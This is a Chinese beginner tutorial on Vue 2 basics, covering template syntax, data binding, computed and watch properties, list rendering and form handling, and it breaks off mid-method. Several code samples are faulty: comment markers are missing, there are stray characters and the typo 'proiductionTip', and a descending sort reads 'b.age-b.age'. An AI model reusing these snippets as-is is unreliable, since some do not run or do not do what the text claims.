0


万字Vue基础,初学者必备

初识Vue

    
    1.想让Vue工作,就必须创建一个Vue实例,且要传入一个配置对象;
    2.root容器里的代码依然符合html规范,只不过混入了一些特殊的Vue语法;
    3.root容器里的代码被称为【Vue模板】;
    4.Vue实例和容器是一一对应的;
    5.真实开发中只有一个Vue实例,并且会配合着组件一起使用;
    6.{{xxx}}中的xxx要写js表达式,且xxx可以自动读取到data中的所有属性;
    7.一旦data中的数据发生改变,那么页面中用到该数据的地方也会自动更新;

    <div id="root">

        <h1>5555,{{name.toUpperCase()}}</h1>

    </div>

    <script type="text/javascript">

        Vue.config.productionTip = false; //阻止启动时生成生产模式

       创建Vue实例

        new Vue({

            el:'#root', //el element简写 用于指定当前vue实例为当前哪个容器服务
                        //值通常为CSS选择器字符串

            data:{ //data中用于存储数据,数据供el所指定的容器去使用
                   //值我们暂时写成一个对象

                name :'zdd'

            }

     });

vue模板语法

<div id = 'root'>
    <h1>插值语法</h1>
    <h3>你好,{{name}}</h3>

    Vue 模板语法  
    1.插值语法
       功能 : 用于解析标签体内容 
       写法 : {{XXX}} XXX为js表达式 且可以直接读取到data中的所有属性 

    <h1>指令语法</h1>
    <h3><a v-bind:href="url">点我去{{school.name}}</a></h3> 
    <h3><a :href="url">点我去百度2</a></h3>

    使用v-bind时,后边引号内容会当做表达式来执行 
    v-bind 可简写为 : 
    
    2.指令语法
       功能 : 用于解析标签(包括 : 标签属性 标签体内容 绑定事件...)
       举例 : v-bind:href="xxx" 或者简写为 :href="xxx" xxx为js表达式 
              且可以读取到data中的属性
       备注 : vue中有很多指令 且形式都为 v-xxxx 此处只是拿v-bind举个例子 
    
</div>

<script type="text/javascript">
    new Vue({·
        el :'#root',
        data :{
            name : 'zdd',
            school : {
                name : '度11',  
                url : 'www.baidu.com'
            }
        }
    })
</script>

数据绑定

<div id = 'root'>
    单向数据绑定: <input type="text" v-bind:value = 'name'>        
    双向数据绑定: <input type="text" v-model:value = 'name'>
    双向数据绑定: <input type="text" v-model = 'name'>   
</div>

vue数据绑定有两种写法
    1.单向数据绑定: v-bind 数据只能从data流向页面
    2.双向数据绑定: v-model 数据不仅可以从data流向页面,还可以从页面流向data
    备注 : 
    1.双向绑定一般都应用在表单类元素上(如 input select 等等)
    2.v-model:value可以简写为 v-model 因为v-model默认收集的就是value值

<script type="text/javascript">
    new Vue ({
        el:'#root',
        data :{
            name : 'zdd'
        }
    }) 
</script>

el与data的两种写法

<div id = 'root'>
        <h1>你好,{{name}}</h1>
</div>

<script type="text/javascript">
 data与el的2种写法

  1.el有2种写法
      (1).new Vue时候配置el属性。
      (2).先创建Vue实例,随后再通过vm.$mount('#root')指定el的值。

  2.data有2种写法
      (1).对象式
      (2).函数式
      如何选择:目前哪种写法都可以,以后学习到组件时,data必须使用函数式,否则会报错。

  3.一个重要的原则:
      由Vue管理的函数,一定不要写箭头函数,一旦写了箭头函数,this就不再是Vue实例了。

 el的两种写法

 第一种写法
 new Vue({
     el : '#root',
     data : {
        name : 'zdd'
     }
 })

 第二种写法
 const v = new Vue({
     data : {
         name : 'zdd'
     }
 })
 v.$mount('#root') 

data的两种写法

第一种写法 对象式
 new Vue({
     el :'#root',
     data: {   //对象式
         name : 'dddd'
     }
 }) 

第二种写法  函数式 
new Vue ({
    el:'#root',
    data(){   //函数式
        return{
            name :'dddd'
        }
    }
})
</script>

MVVM模型


    M :  模型(Model)  对应data中的数据
    V :  视图(View)   模板
    VM : 视图模型(ViewModel) Vue实例
    data中出现的所有的属性 最后都出现在了vm身上
    vm身上的所有属性 以及vue原型上的所有属性 
    在vue模板中都可以直接使用
    
 ↓↓↓ View 视图 模板
<div id='root'>
    <h1>你好,{{name}}</h1>
    <h1>我是,{{address}}</h1>
</div>

<script type="text/javascript">

new Vue({   
    ↓↓↓ ViewModel 视图模型 Vue实例
    el : '#root',
    data :{
        ↓↓↓ Model 模型 对应data中的数据
        name : 'zdd',
        address :'handan'
    }
})
</script>

数据代理

回顾objec.defineproperty

<script type="text/javascript">
    let number = 18
    let person ={
        name : 'zdd',
        sex :'男',
    }
Object.defineProperty(person,'age',{  //追加一个age属性 
    value : 18,
    enumerable:true, //控制属性是否可以被枚举 默认值为false
    writable : true, //控制属性是否可以被修改 默认值为false
    configurable : true,//控制属性是否可以被删除 默认值为false
    //当有人读取person的age属性时,get函数(getter)就会被调用且返回值就是age的值
    get(){
        return number
    },
    //当有人修改person的age属性时,set函数(setter)就会被调用,且会收到修改的具体值
    set(value){
        number = value 
    }
})
console.log(person);

数据代理: 通过一个对象代理对另一个对象中属性的操作(读/写)

<script type="text/javascript">
    let aa = {x:100}
    let bb = {y:100}
    Object.defineProperty(bb,'x',{  //在bb中添加x属性 
        get(){  
            //当读取bb对象中 x 的值时 get函数会返回aa中x的值
            return aa.x
        },
        //当修改bb对象中的 x 值时 set函数会把value值赋给aa对象中的x 
        //从而实现通过一个对象代理对另一个对象中属性的操作
        set(value){  
            aa.x = value
        }
    })
</script>

1.vue中的数据代理:
    通过vm对象来代理data对象中属性的操作
        
2.vue中数据代理的好处:
    更加方便的操作data中的数据 

3.基本原理
    通过Object.defineproperty()把data对象中的所有属性添加到vm上
    为每个添加到vm上的属性 都指定一个getter/setter
    在getter/setter内部去操作(读/写)data中对应的属性 

<div id = 'root'>
    <h1>学校名称 :{{name}}</h1>
    <h1>学校地址 :{{address}}</h1>
</div>

<script type="text/javascript">
    const vm = new Vue({
        el : '#root',
        data :{
            name :'zd',
            address : 'ypw'
        }
    })
</script>

事件处理

事件的基本使用:
1.使用v-on:xxx 或者@xxx 绑定事件,xxx为事件名
2.事件的回调需要配置在methods对象中 最终会在vm上
3.methods中配置的函数 不要用箭头函数 否则this就不是vm了
  methods中配置的函数 都是被Vue所管理的函数 this的指向是vm
  或者是组件实例对象
4.@click = 'demo' 和 @click = 'demo($event)' 
  效果一致 但是后者可以传参数 

<div id = 'root'>
    <h1>你好,{{name}}</h1>
    单击事件 showInfo为数据绑定
    <button v-on:click='showInfo'>点我提示信息</button>

    可以简写为 ↓↓↓↓ 
    <button @click='showInfo'>点我提示信息</button>
</div>

<script type="text/javascript">
    const vm = new Vue({
    el:'#root',
    data:{
        name:'研二'
    },
    methods:{  //使用methods方法来对应showinfo
        showInfo(){
            alert('你好啊!') 
            // console.log(this); 此时的this为vm实例对象
        }
    }
})
</script>

Vue中的事件修饰符:修饰符可以连续写  
    1.prevent : 阻止默认事件(常用)
    2.stop : 阻止事件冒泡 (常用)
    3.once : 事件只触发一次 (常用)
    4.capture : 使用事件的捕获模式
    5.self : 只有event.target 是当前操作的元素时才触发事件
    6.passive :事件的默认行为立即执行 无需等待事件回调执行完毕

<div id = 'root'>
    <h2>你好,{{name}}</h2>  

    阻止事件的默认行为 @click.prevent
    <a href="www.baidu.com" @click.prevent='showInfo'>点击</a> 

    阻止事件冒泡 @click.stop
    <div class="demo1" @click='showInfo'>
    <button @click.stop='showInfo'>点击</button>
    </div>

    事件只触发一次 @click.once
    <button @click.once='showInfo'>点击</button>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm =  new Vue({
        el : "#root",
        data:{
            name : '研二'
        },
        methods:{
            showInfo(e){
                alert('你好啊 ')
            }
        }
    })
</script>

1.Vue中常用的按键别名
    回车 : enter
    删除 : delete (捕获删除和退格键)
    退出 : esc
    空格 : space
    换行 : tab (特殊 必须配合keydown使用)
    上 : up
    下 : down
    左 : left
    右 : right

2.Vue未提供别名的按键,可以使用按键原始的key值来绑定
 但要注意转为 kebab—case(短横线命名) 例如 CapsLock 
 应该命名为caps-lock 两个不同的单词之间要用短横线连接 
 且两个单词开头要小写

3.系统修饰键 (用法特殊) :Ctrl alt shift meta(win键) 
    (1).配合keyup使用时, 按下修饰键的同时 再按下其他键 
        随后释放其他键 事件可以触发
    (2).配合keydown使用时,正常使用触发事件

4.也可以使用keyCode去指定具体的按键 (不推荐)  
  例如 @keyup.enter可以改写为@keyup.13

5.Vue.config.keyCodes.自定义键名 = 键码  
  可以去定制按键别名
  Vue.config.keyCodes.huiche= 13  
  将回车键 改为 'huiche'
   
<div id = 'root'>
    <h2>你好,{{name}}</h2>
    @keyup.enter 当按下回车时 触发事件
    <input type="text" placeholder="按回车提示输入内容"
     @keyup.enter=showInfo>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    new Vue({
        el :'#root',
        data : {
            name : '研二'
        },
        methods:{
            showInfo(e){
                console.log(e.target.value);
            }
        }
    }) 
</script>

计算属性

插值语法实现姓名案例 
<div id = 'root'>
    姓 :<input type="text" v-model="firstName"><br><br>
    名 :<input type="text" v-model="lastName"><br><br>
    姓名:<span>{{firstName}}-{{lastName}}</span>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    new Vue({
        el : '#root',
        data:{
            firstName : '张',
            lastName : '三'
        }
    })
</script>

methods实现姓名案例 
<div id = 'root'>
    姓 :<input type="text" v-model="firstName"><br><br>
    名 :<input type="text" v-model="lastName"><br><br>
    姓名:<span>{{fullName()}}</span>
</div>

只要data中的数据发生改变 vue会重新解析模板 从而更新数据 
<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm = new Vue({
        el : '#root',
        data:{
            firstName : '张',
            lastName : '三'
        },
        methods:{
            fullName(){
                return this.firstName +'-'+this.lastName
            }
        }
    })
</script>

计算属性实现姓名案例 
<div id = 'root'>
    姓 :<input type="text" v-model="firstName"><br><br>
    名 :<input type="text" v-model="lastName"><br><br>
    姓名:<span>{{fullName}}</span>
</div>
 
计算属性 :
    1.定义:要用的属性不存在 要通过已有的属性计算得来
    2.原理:底层借助了Object.defineproperty方法提供的getter和setter
    3.get函数什么时候调用
        1.初次读取fullName时调用  
        2.所依赖的的数据发生变化时
    4.优势 : 与methods方法相比 内部用缓存机制 (复用) 效率更高 调式方便
    5.备注 :
        1.计算属性最终会出现在vm上,直接读取使用即可
        2.如果计算属性要被修改 必须写set函数去响应修改 且set中要引起计算时依赖数据发生改变

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm = new Vue({
        el : '#root',
        data:{
            firstName : '张',
            lastName : '三'
        },
        computed:{
            fullName:{
                // get 作用 当有人读取fullName时 get会被调用 且返回值就作为fullName的值
                get(){
                    return this.firstName + '-' + this.lastName
                },
                set(value){  //set在fullName被修改时调用
                    const arr = value.split('-')
                    this.firstName = arr[0]
                    this.lastName = arr[1]
                }
            }
        }
    })
</script>

计算属性简写
<div id = 'root'>
    姓 :<input type="text" v-model="firstName"><br><br>
    名 :<input type="text" v-model="lastName"><br><br>
    姓名:<span>{{fullName}}</span>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm = new Vue({
        el : '#root',
        data:{
            firstName : '张',
            lastName : '三'
        },
        computed:{
             fullName:{
                get(){
                    return this.firstName + '-' + this.lastName
                }
             } 
         }
 可以简写为----------- 只考虑读取 不考虑修改时 可采用简写形式 
        computed:{
            fullName(){
                return this.firstName + '-' + this.lastName
            }
        }
    })
</script>

监视属性

天气监视案例
<div id = 'root'>
    <h2>今天天气{{info}}</h2>
    绑定事件的时候 @xxx='可以写一些简单的语句'
    <button @click='isHot = !isHot'>切换天气</button> 
    <button @click='changeWeather'>切换天气</button>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    new Vue({
        el : '#root',
        data: {
            isHot: true
        },
        computed: {
            info(){
                return this.isHot ? '炎热' : '凉爽'
            }
        },
        methods: {
            changeWeather(){
                this.isHot = !this.isHot
            }
        },
    })
</script>

天气案例-监视属性
 
    监视属性Watch:
    1.当被监视的属性发生变化时,回调函数自动调用 进行相关操作
    2.监视的属性必须存在 才能进行监视
    3.监视的两种写法:
        1.new Vue时传入Watch配置
        2.通过vm.$watch监视

<div id = 'root'>
    <h2>今天天气{{info}}</h2>
    <button @click='changeWeather'>切换天气</button>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm = new Vue({
        el : '#root',
        data: {
            isHot: true
        },
        computed: {
            info(){
                return this.isHot ? '炎热' : '凉爽'
            }
        },
        methods: {
            changeWeather(){
                this.isHot = !this.isHot
            }
        },
        watch:{
            isHot:{
                 immediate:true,//初始化时 让handler调用一下
               // handler 在isHot发生改变时调用
                handler(newValue,oldValue){ 
                    console.log(newValue,oldValue);
                }
            }
          }
    })
        
    vm.$watch('isHot',{
        immediate:true,//初始化时 让handler调用一下
        // handler 在isHot发生改变时调用
        handler(newValue,oldValue){ 
        console.log(newValue,oldValue);
        } 
    })
</script>

天气案例-深度监视

深度监视:
    1.Vue中watch默认不检测对象内部值的变化(一层)
    2.配置deep:true可以检测对象内部值的变化 (多层)
备注:
    1.Vue自身可以检测对象内部值的变化,但Vue提供的watch默认不可以
    2.使用watch时,根据数据的具体结构,决定是否采用深度监视

<div id = 'root'>
    <h2>今天天气{{info}}</h2>
    <button @click='changeWeather'>切换天气</button>
    <br>
    <hr>
    <h3>a的值:{{numbers.a}}</h3>
    <button @click= "numbers.a++">点我让a加1</button>
    <h3>b的值:{{numbers.b}}</h3>
    <button @click= "numbers.b++">点我让b加1</button>
</div>
   
<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm = new Vue({
        el : '#root',
        data: {
            isHot: true,
            numbers:{
                a:1,
                b:2
            }
        },
        computed: {
            info(){
                return this.isHot ? '炎热' : '凉爽'
            }
        },
        methods: {
            changeWeather(){
                this.isHot = !this.isHot
            }
        },
        watch:{
            isHot:{
                immediate:true,//初始化时 让handler调用一下
                // handler 在isHot发生改变时调用
                handler(newValue,oldValue){ 
                    console.log(newValue,oldValue);
                }
            },
            // 监视多级结构中某个属性的变化
            "numbers.a":{
                deep:true,
                handler(){
                    console.log('a改变了');
                }
            },
            // 监视多级结构中所有属性的变化
            numbers:{
                deep:true,
                handler(){
                    console.log('numbers改变了');
                }
            }
        }
    })
</script>

监视属性简写
<div id = 'root'>
    <h2>今天天气{{info}}</h2>
    <button @click='changeWeather'>切换天气</button>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm = new Vue({
        el : '#root',
        data: {
            isHot: true,
        },
        computed: {
            info(){
                return this.isHot ? '炎热' : '凉爽'
            }
        },
        methods: {
            changeWeather(){
                this.isHot = !this.isHot
            }
        },
        watch:{
             isHot:{
                 immediate:true,//初始化时 让handler调用一下
                 handler(newValue,oldValue){ 
                     console.log(newValue,oldValue);
                 }
             },

            简写
             isHot(newValue,oldValue){
                 console.log(newValue,oldValue);
             }
        }
    })
     vm.$watch('isHot',{
             immediate:true,//初始化时 让handler调用一下
             // handler 在isHot发生改变时调用
             handler(newValue,oldValue){ 
             console.log(newValue,oldValue);
             } 
     })
    简写 不允许写成箭头函数 会造成this指向错误  会指向window
    vm.$watch('isHot',function(newValue,oldValue){
        console.log(newValue,oldValue);
    })
</script>

姓名案例 watch实现

computed和watch的区别
    1.computed能完成的功能,watch都能完成
    2.watch能完成的功能 computed不一定能完成 例如 watch可以进行异步任务
      重要小原则 
    1.所有被vue所管理的函数 最好写成普通函数 这样this的指向才是vm或者组件实例对象
    2.所有不被vue所管理的函数 最好写成箭头函数 例如(定时器的回调函数
     ajax的回调函数,promise的回调函数)这样this的指向才是vm 或 组件实例对象

<div id = 'root'>
    姓 :<input type="text" v-model="firstName"><br><br>
    名 :<input type="text" v-model="lastName"><br><br>
    姓名:<span>{{fullName}}</span>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm = new Vue({
        el : '#root',
        data:{
            firstName : '张',
            lastName : '三',
            fullName:"张-三"
        },
        watch: {  // watch可以开启异步任务
            firstName(val){
                setTimeout(() => {  //延迟一秒实现
                    this.fullName = val + '-'+ this.lastName
                }, 1000);
            },
            lastName(val){
                this.fullName = this.firstName +'-'+ val
            }
        },
    })
</script>

绑定样式

1.class样式
    写法:class='xxx' xxx可以是字符串,对象 数组
    字符串写法适用于 类名不确定 要动态获取
    对象写法适用于 要绑定多个样式 个数不确定 名字不确定
    数组写法适用于 要绑定多个样式 个数确定 名字确定
2.style样式 
    :style='{fontSize:xxx}' 其中xxx是动态值
    :style='[a,b]'其中a、b为样式对象
    样式对象的key命名时应为存在的css属性

<div id = 'root'>
    绑定class样式,字符串写法 适用于样式的类名不确定 需要动态决定 
    <div class="basic" :class="mood" @click="changeMood">{{name}}</div> <br><br>

    绑定class样式 数组写法 适用于 要绑定的样式个数不确定 名字也不确定 
    <div class="basic" :class="classArr">{{name}}</div>  <br><br>

    绑定class样式 对象写法 适用于 要绑定的样式个数确定 名字确定 但要动态决定用不用
    <div class="basic" :class="classObj">{{name}}</div> <br><br>  
    
    绑定style样式  对象写法
    <div class="basic" :style="styleObj">{{name}}</div> <br><br>

    绑定style样式  数组写法
    <div class="basic" :style="styleArr">{{name}}</div> <br><br>  
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm = new Vue({
        el:'#root',
        data:{
            name:"研二",
            mood:'normal',
            classArr:['atguigu1','atguigu2','atguigu3'],
            classObj:{
                atguigu1:false,
                atguigu2:false
            },
            styleObj:{
                fontSize :'40px',
                color : 'pink',
                backgroundColor:'blue'
            },
            styleArr:[{fontSize:'40px',color:'blue'},{backgroundColor:'pink'}
            ]
        },
        methods: {
            changeMood(){
                const arr = ['sad','happy','normal']            
                const index = Math.floor(Math.random()*3)
                this.mood = arr[index]
            }
        },
    })
</script>

条件渲染

1.v-if 写法 
    v-if= '表达式'
    v-else-if= '表达式'
    v-else= '表达式'
    适用于 切换频率较低的场景
    特点 不展示的DOM元素直接被移除
    注意 v-if可以和v-else-if v-else一起使用 但结构不可以被打断

2.v-show 写法
    v-show = "表达式"
    适用于切换频率较高的场景
    特点 不展示的DOM元素未被移除 仅仅是使用样式隐藏掉

3.备注 使用v-if是 元素可能无法获取到 而使用v-show一定可以获取到

<div id = 'root'>
    使用v-show做条件渲染
    <h2 v-show="true">你好,{{name}}</h2> 
    <h2 v-show="1===1">你好,{{name}}</h2> 

    使用v-if做条件渲染
    h2 v-if="true">你好,{{name}}</h2> 
    <h2 v-if="1===1">你好,{{name}}</h2> 

    <h2>当前的n值是{{n}}</h2>
    <button @click='n++'>点我+1</button>
    <div v-show = 'n===1'>我是1</div>
    <div v-show = 'n===2'>我是2</div> 

    <h2>当前的n值是{{n}}</h2>
    <button @click='n++'>点我+1</button>
    <div v-if = 'n===1'>我是1</div>
    <div v-if = 'n===2'>我是2</div> 

    <h2>当前的n值是{{n}}</h2>
    <button @click='n++'>点我+1</button>
    <div v-if = 'n===1'>我是1</div>
    中间不可以被打断
    <div v-else-if = 'n===2'>我是2</div> 

    <h2>当前的n值是{{n}}</h2>
    <button @click='n++'>点我+1</button>
    <div v-if = 'n===1'>我是1</div>
    中间不可以被打断
    <div v-else = 'n===2'>我是{{n}}</div>

   v-if 和 template的配合使用 
    <template v-if = 'n===1'>
        <h2>你好</h2>
        <h2>研二</h2>
    </template> 
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    new Vue({
        el:"#root",
        data:{
            name:'研二',
            n:0
        }
    })
</script>

列表渲染

基本列表 
 遍历 v-for指令 
    1.用于展示列表数据
    2.语法:v-for='(item,index)in xxx ' :key='yyy'
    3.可遍历:数组 对象 字符串 指定次数 
 
<div id = 'root'>

 遍历数组
<h2>人员列表</h2>
<ul>
    <!-- <li v-for="p in personslis" :key="p.id">{{p.name}}-{{p.age}}</li> -->
    或者
    <li v-for="(p,index) in personslis" :key="index">{{p.name}}-{{p.age}}</li>
    </ul>

    遍历对象 
    <h2>汽车信息</h2>
    <ul>
        <li v-for='(a,b) of car' :key='b'>
            {{a}}-{{b}}
        </li>
    </ul>

    遍历字符串 
    <h2>测试遍历字符串</h2>
    <ul>
        <li v-for='(a,b) of str' :key='b'>
            {{a}}-{{b}}
        </li>
    </ul>

    遍历指定次数 
    <h2>遍历指定次数</h2>
    <ul>
        <li v-for='(a,b) of 5' :key='b'>
            {{a}}-{{b}}
        </li>
    </ul>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    new Vue({
        el:'#root',
        data:{
            personslis:[
                {id:'001',name:'研二',age:24},
                {id:'002',name:'赵',age:22},
                {id:'003',name:'d',age:21}
            ],
            car:{
                name : 'audi',
                price : '70万',
                color:'黑色'
            },
            str:'yaner'
        }
    })
</script>

 key的原理 

面试题react vue中的key有什么作用 (key的内部原理)
    1.虚拟dom中key的作用:
      key是虚拟dom对象的标识 当数据发生变化时vue会根据新数据生成新的虚拟dom
      随后vue进行新虚拟dom与旧虚拟dom的差异比较 比较规则如下:
    2.对比规则
      (1).旧虚拟dom中找到了与新虚拟dom相同的key
        若虚拟dom中的内容没变 直接使用之前的真实dom
        若虚拟dom中的内容变了则生成新的真实dom 随后替换掉页面中之前的真实dom
      (2).旧虚拟dom中未找到与新虚拟dom相同的key
        创建新的真实dom 随后渲染到页面
    3.用index作为key可能会引发的问题 
      (1).若对数据进行 逆序添加 逆序删除等破坏顺序操作
        会产生没有必要的真实dom更新 页面效果没问题但是效率低
      (2).如果结构中还包含输入类dom
        会产生错误dom更新 界面有问题
    4.开发中如何选择key 
      (1).最好使用每条数据的唯一标识作为key 比如id手机号身份证号学号等唯一值
      (2).如果不存在数据的逆序添加 逆序删除 等破坏顺序操作 
          仅用于渲染列表用于展示 则使用index作为key是没有问题的 

<div id = 'root'>
    <h2>人员列表</h2>
    <button @click="info">添加一个全</button>
    <ul>
        <li v-for="(p,index) in personslis" 
        :key="p.id">{{p.name}}-{{p.age}}
        <input type="text">
        </li>
    </ul>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    new Vue({ 
        el:'#root',
        data:{
            personslis:[
                {id:'001',name:'研二',age:24},
                {id:'002',name:'赵赵',age:22},
                {id:'003',name:'dd',age:21}
            ],
        },            
        methods: {
            info(){
                const a ={id:'004',name :"全",age :'18'}
                this.personslis.unshift(a)
            }
        },
    })
</script>

列表过滤 
<div id = 'root'>
    <h2>人员列表</h2>
    <input type="text" placeholder="请输入名字" v-model= 'keyWord'>
    <ul>
    <li v-for="(p,index) in filpersonslis" 
        :key="p.id">{{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    用watch实现
    #region
    new Vue({
         el:'#root',
         data:{
            keyWord:'',
            personslis:[
                {id:'001',name:'马冬梅',age:24 ,sex :'女'},
                {id:'002',name:'周冬雨',age:22 ,sex :'女'},
                {id:'003',name:'周杰伦',age:21 ,sex :'男'},
                {id:'004',name:'温兆伦',age:20 ,sex :'男'}
            ],
            filpersonslis:[]
          },
        watch:{
            keyWord:{
                immediate : true,
                handler(val){
                    this.filpersonslis = this.personslis.filter
                    ((p)=>{return p.name.indexOf(val) !== -1 })
                }
            }
       }
    })
   #endregion

    用computed实现 
    new Vue({
        el:'#root',
        data:{
            keyWord:'',
            personslis:[
                {id:'001',name:'马冬梅',age:24 ,sex :'女'},
                {id:'002',name:'周冬雨',age:22 ,sex :'女'},
                {id:'003',name:'周杰伦',age:21 ,sex :'男'},
                {id:'004',name:'温兆伦',age:20 ,sex :'男'}
            ],
        },
        computed:{
            filpersonslis(){
                return this.personslis.filter((p)=>{
                    return p.name.indexOf(this.keyWord) !== -1
                })
            }
        }
    }) 
</script>

列表排序
<div id = 'root'>
     遍历数组 
    <h2>人员列表</h2>
    <input type="text" placeholder="请输入名字" v-model= 'keyWord'>
    <button @click = 'sortType = 2'>年龄升序</button>
    <button @click = 'sortType = 1'>年龄降序</button>
    <button @click = 'sortType = 0'>原顺序</button>
    <ul>
        <li v-for="(p,index) in filpersonslis" :key="p.id">
        {{p.name}}-{{p.age}}-{{p.sex}}</li>
    </ul>
</div>

<script type="text/javascript">
    Vue.config.proiductionTip = false 
    // 用computed实现 
    new Vue({
        el:'#root',
        data:{
            keyWord:'',
            sortType:0, //0原顺序 1降序 2升序
            personslis:[
                {id:'001',name:'马冬梅',age:24 ,sex :'女'},
                {id:'002',name:'周冬雨',age:22 ,sex :'女'},
                {id:'003',name:'周杰伦',age:21 ,sex :'男'},
                {id:'004',name:'温兆伦',age:20 ,sex :'男'}
            ],
        },
        computed:{
            filpersonslis(){
                const arr =  this.personslis.filter((p)=>{
                    return p.name.indexOf(this.keyWord) !== -1
                })
                判断一下是否需要排序
                if(this.sortType){
                    arr.sort((a,b)=>{
                        return this.sortType === 1 ? b.age-b.age : a.age-b.age
                    }) 
                }
                return arr 
            }
        }
    })
    
     sort方法
      let arr = [1,5,3,4,6]
      arr.sort((a,b)=>{
          return a-b 升序
          return b-a 降序
      })
      console.log(arr);
</script>

 模拟一个数据检测
<script type="text/javascript" >
    let data = {
        name:'尚',
        address:'北京',
    }

    创建一个监视的实例对象,用于监视data中属性的变化
    const obs = new Observer(data)      
    console.log(obs)  
    
    准备一个vm实例对象
    let vm = {}
    vm._data = data = obs
    function Observer(obj){

        汇总对象中所有的属性形成一个数组
        const keys = Object.keys(obj)  

        遍历
        keys.forEach((k)=>{
            Object.defineProperty(this,k,{
                get(){
                    return obj[k]
                },
                set(val){
                    console.log(`${k}被改了,我要去解析模板,生成虚拟DOM`)
                    obj[k] = val
                }
            })
        })
    }
</script>

监视数据原理总结

1.vue会监视data中所有层次的数据

2.如何检测对象中的数据
    1.通过setter实现监控 且要在new vue时就传入要检测的数据
    2.对象中后追加的属性 vue默认不做响应式处理
    3.如需给后添加的属性做响应式 请使用如下api
        Vue.set(target,propertyName/index,value)
        vm.$set(target,propertyName/index,value)

3.如何检测数组中的数据
    通过包裹数组更新元素的方法实现,本质就是做了两件事
    1.调用原生对应的方法对数组进行更新
    2.重新解析模板,进而更新页面

4.在Vue修改数组中的某个元素一定要用如下方法
    1.使用这些API 
        push(可向数组的末尾添加一个或多个元素,并返回新的长度)
        pop(移除一个元素,默认最后一个元素)
        shift(移除数组的第一项)
        unshift(可向数组的开头添加一个或更多元素,并返回新的长度)
        splice(添加或删除数组中的元素)
        sort(对原列表进行排序,如果指定参数,则使用比较函数指定的比较函数)
        reverse(颠倒数组中元素的顺序)
特别注意 Vue.set() 和 vm.$set() 不能给vm或者vm的根数据对象(_data)添加属性 

<div id = 'root'>
    <h1>学生信息</h1> 
    <button @click='student.age++'>年龄+1</button><br>
    <button @click='addSex'>添加性别属性</button><br>
    <button @click='student.sex="未知" '>添加性别属性</button><br>
    <button @click='addFriend'>列表首位添加一个朋友</button><br>
    <button @click='updatafirstfriendName'>修改第一名字为:张</button><br>
    <button @click='addHobby'>添加一个爱好</button><br>
    <button @click='removeWeibo'>移除微博爱好</button><br>
    <button @click='updateHobby'>修改第一个爱好为:开车</button><br>

    <h3>姓名:{{student.name}}</h3>
    <h3>年龄:{{student.age}}</h3>
    <h3 v-if='student.sex'>性别:{{student.sex}}</h3>
    
    <h3>爱好:</h3>
    <ul>
        <li v-for="(h,index) in student.hobby" :key="index">
            {{h}}
        </li>
    </ul>
    <h3>朋友们:</h3>
    <ul>
        <li v-for="(f,index) in student.friends" :key="index">
            {{f.name}}--{{f.age}}
        </li>
    </ul>
</div>
<script type="text/javascript">
    Vue.config.proiductionTip = false 
    const vm = new Vue({
        el:'#root',
        data:{
            student:{
                name:'研二',
                age:24,
                hobby:['听歌','打羽毛球','刷微博'],
                friends:[
                    {name:'jerry',age:35},
                    {name:'tony',age:36}
                ]
            }
        },
        methods: {
            addSex(){
                Vue.set(this.student,'sex','女')
                vm.$set(this.student,'sex','女')
            },
            addFriend(){
                vm.student.friends.unshift({name:'赵',age:21})
            },
            updatafirstfriendName(){
                vm.student.friends[0].name = "dd"
            },
            addHobby(){
                vm.student.hobby.push('学习')
            },
            updateHobby(){
                vm.student.hobby.splice(0,1,'开车')
                Vue.set(vm.student.hobby,0,'开车')
                this.$set(vm.student.hobby,0,'开车')
            },
            removeWeibo(){
                this.student.hobby = this.student.hobby.filter((h)=>{
                    return h!= '刷微博'
                })
            }
        },
    })
</script>

收集表单数据

收集表单数据:
若:<input type="text"/>,则v-model收集的是value值,用户输入的就是value值。
若:<input type="radio"/>,则v-model收集的是value值,且要给标签配置value值。
若:<input type="checkbox"/>
1.没有配置input的value属性,那么收集的就是checked(勾选 or 未勾选,是布尔值)
2.配置input的value属性:
    (1)v-model的初始值是非数组,那么收集的就是checked(勾选 or 未勾选,是布尔值)
    (2)v-model的初始值是数组,那么收集的的就是value组成的数组
        备注:v-model的三个修饰符:
            lazy:失去焦点再收集数据
            number:输入字符串转为有效的数字
            trim:输入首尾空格过滤

准备好一个容器
<div id="root">
    <form @submit.prevent="demo">
        账号:<input type="text" v-model.trim="userInfo.account"> <br/><br/>
        密码:<input type="password" v-model="userInfo.password"> <br/><br/>
        年龄:<input type="number" v-model.number="userInfo.age"> <br/><br/>
        性别:
        男<input type="radio" name="sex" v-model="userInfo.sex" value="male">
        女<input type="radio" name="sex" v-model="userInfo.sex" value="female">
        <br/><br/>
        爱好:
        学习<input type="checkbox" v-model="userInfo.hobby" value="study">
        打游戏<input type="checkbox" v-model="userInfo.hobby" value="game">
        吃饭<input type="checkbox" v-model="userInfo.hobby" value="eat">
        <br/><br/>
        所属校区
        <select v-model="userInfo.city">
            <option value="">请选择校区</option>
            <option value="beijing">北京</option>
            <option value="shanghai">上海</option>
            <option value="shenzhen">深圳</option>
            <option value="wuhan">武汉</option>
        </select>
        <br/><br/>
        其他信息:
        <textarea v-model.lazy="userInfo.other"></textarea> <br/><br/>
        <input type="checkbox" v-model="userInfo.agree">阅读并接受
        <a href="http://www.atguigu.com">《用户协议》</a>
        <button>提交</button>
    </form>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({
        el:'#root',
        data:{
            userInfo:{
                account:'',
                password:'',
                age:18,
                sex:'female',
                hobby:[],
                city:'beijing',
                other:'',
                agree:''
            }
        },
        methods: {
            demo(){
